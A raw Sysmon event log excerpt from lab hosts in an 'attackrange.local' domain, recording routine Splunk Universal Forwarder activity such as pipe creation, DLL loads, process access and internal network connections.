Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606129Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.450{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606128Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:26.450{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606127Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:26.450{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606126Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:26.450{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606125Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:26.450{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606124Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:26.450{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606123Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:26.450{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001606122Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.118{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606121Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.118{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDD28329A4BF8DDCF0A7D6E0EE03FF35,SHA256=056EBD0BA34897B48AA784672C09B453D963978077D88E9791D26E4AFDC9A1C2falsefalse - insufficient disk space 10341000x80000000000000001095223Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:26.509{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095222Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:26.509{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095227Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:27.561{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37639C1D070B2478F24895E54D723731,SHA256=DB5FB978381CDE1CBFF450A66DC4B8B225CE73C2A62EA98EDCA1B2624CA747AE,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606184Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:27.487{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606183Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:27.487{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A992983BA1444CDA308205CE21378C5,SHA256=5DE711B233BFAC8906AC846969769A56FE8614704780255EBB4B12E90A9FE1F6falsefalse - insufficient disk space 11241100x80000000000000001606182Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:27.487{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606181Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:27.486{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AF864EC5EFE2D1BA601B1771E5783C3,SHA256=79095C3C1E91AF57C8C85E555F9A2E139868A7A50510CC3486FD9BCEC3ADE0D2falsefalse - insufficient disk space 11241100x80000000000000001606180Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:27.321{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606179Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:27.321{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43B245216D2E583AE31EBB6E51F54F31,SHA256=358F59DBBD3299C2F7A1E78415FA24035887F9D6D2E9DEDEE72B1A0842AC7E99falsefalse - insufficient disk space 10341000x80000000000000001095226Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:27.509{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095225Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:27.509{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095230Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:28.563{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC646F38F71B93F4DF915DD066C33022,SHA256=F6A451015886708B62F04E375BD2B88CA0D49BC5618F067B01DC37BD4FD08B72,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606187Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.733{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49732-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606186Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:28.323{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606185Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:28.323{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4350B59299917F1C7B9B43E09F6DABFD,SHA256=9C488BA20E825E46F7FED5E59E0823E138CC592474F73F173FC135B796B0DAFEfalsefalse - insufficient disk space 10341000x80000000000000001095229Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:28.510{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095228Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:28.510{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095234Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:29.571{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B1CCB7DD63C7A9FFD013AD0815C4BA7,SHA256=BE7CCE1B3C105F59E849DA10FA9514907941F92AE5FC99152C329083AA009121,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606189Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:29.410{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606188Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:29.410{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3B9C6A7E6E5C9DC15996CB4FA56D4E2,SHA256=CDA7729899063E18DF032F79E887F3C8E9B497F1BA4B4D42A6FC30F9C4888BA9falsefalse - insufficient disk space 10341000x80000000000000001095233Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:29.510{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095232Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:29.510{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095231Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:29.379{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E426AF4DFD98A50F3384CB1D71AA3C3,SHA256=DFA7C48FE9E7AFF232D60AC07A0AC1D877C940F577CABEDF36875CAE3EA2A431,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001095238Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:25.796{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1155nfafalse10.0.1.12-8000- 23542300x80000000000000001095237Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:30.579{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05FFE778DCCFF13CB69A9823DC5F00A,SHA256=385E587C4CDFDD9987713005F6ADBCCC86829F4EA4544A906C7C06BEC0BA43C9,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606251Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.828{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606250Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.828{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C71ECA164B3AC3BE6B639A60244FD42,SHA256=EC313FA091E5DF544EFE851D16005239638A074F2F56A6C89C79B18C745F4C27falsefalse - insufficient disk space 534500x80000000000000001606249Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.496{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001606248Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.496{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001606247Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.495{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606246Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.495{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606245Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.374{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606244Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.374{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606243Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.374{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606242Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.374{21761711-7A86-6080-C360-00000000BB01}5724\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001606241Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606240Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001606239Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606238Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606237Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606236Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606235Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001606234Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606233Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 